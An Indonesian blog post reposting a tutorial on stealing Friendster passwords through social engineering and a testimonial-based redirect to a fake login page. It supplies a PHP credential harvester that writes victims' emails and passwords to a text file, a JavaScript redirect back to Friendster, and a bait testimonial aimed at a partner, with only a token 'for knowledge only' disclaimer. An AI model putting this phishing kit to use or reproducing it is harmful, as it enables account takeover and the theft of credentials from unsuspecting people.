Setelah mencari ide apa yang artikel apa yang harus dimasukan kedalam blog saya.

akhirnya saya memutuskan untuk mencari artikel tentang cara menghacking password
Friendster karena banyak teman - teman saya yang menyarankan untuk memasukan ar
tikel tersebut agar mereka mudah untuk membacanya tanpa perlu memakai search eng
ine segala. dan setelah goggling sejenak akhirnya saya dapat juga di jasakom.com
. nah ini dia selamat membaca. GBU ;)
Penerapan Social Engineering untuk mendapatkan password di Friendster
Date: Wednesday, February 14, 2007 Hits: 14195 By: numpang_lewat
Artikel ini ditujukan bahwa Hacking tidak selamanya menggunakan TOOLS . So bagi p
ara 3133t sebaiknya tidak membaca ARTIKEL ini jika anda tidak ingin mual, perut
kembung, bibir pecah2, kepala senut2.. :P dll.
Artikel ini diperuntunkan bagi anda tertarik, cinta, haus ilmu dari Social Engin
eering.
Sekali lagi Artikel ini hanya ditujukan bagi temen2 yg belum mengetahui teknik i
ni. Jika temen2(terutama for 3133t) Sudah tahu teknik ini SAYA MOHON STOP!! STOP
!! STOP!! STOP!! STOP!! STOP!! tetapi bila anda tetap sja Ngotot ingin meneruska
n saya tidak bisa memaksa anda
Lanjutt .
Akhir-akhir ini banyak yg membicarakannya, bahkan sedang menjadi berita hangat.
Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu. Sebagaimna telah di
jelaskan pada artikel sebelumnya (WuPz, jagonya dll). Testimonial Redirect bisa
jadi berabe bgt kalo disalah gunakan. Artinya?? cara tersebut bisa digunain buat
ngedapetin password, cookies, or perhatian lebih dari doi ama kita ;) ) n laenlaen .. :P .
So langsung saja kita menuju acara puncak
Pertama-tama yg mesti kita siapin :
1.
2.
3.
4.

Teh manis penghangat malam.

Jangan Lupa cemilan yg bikin Kriuk .. kriuk
Web Hosting yg support PHP. Cari di paman Google banyak..
Upload file index.htm (ada di source).

5. Sertakan code php dan JavaScript di bawah ini dan SAVE As sesuai dg nama link
yg dituju pada Form Login.
<?php
$email = $_POST[email];
$password = $_POST[password];
$fl = fopen(password.txt, a);
fwrite($fl, $email . $password \n\n);
fclose($fl);
?>
<SCRIPT LANGUAGE=JavaScript>
window.location=http://www.friendster.com/index.php;
</script>
Dan upload file diatas ke www.webyangsupportphp.com
6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas.
Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.
7. kirim testi dg :

hai syang .. gimna kabarna, kagen nie .. <img id=XcodeCommunity width=0>

nah .. Setelah sang pacar penerima testi membuka New Testimonials, maka sesuai dg
perintah yang berada di JavaScript => window.location <= yg disisipkan maka link
akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara
tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tan
pa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan dg rela hati
mengisi Form login tipuan.
Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh. Si pengirim testi me
nawarkan jasanya untuk sang pacar tercinta :P =] :) )
Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan OVERLAY
GENERATOR pada profil fs pada saat pengiriman testimonial yg berisi html code (
index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) p
ada form login di index.htm maka pada saat pengiriman data akan menuju ke http:/
/webyangsupportphp.com/login.php
Kesimpulan :
# Hacking tidak selamanya menggunakan TOOLS
# Kelemahan XSS merupakan bahaya besar
# Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri
!!!!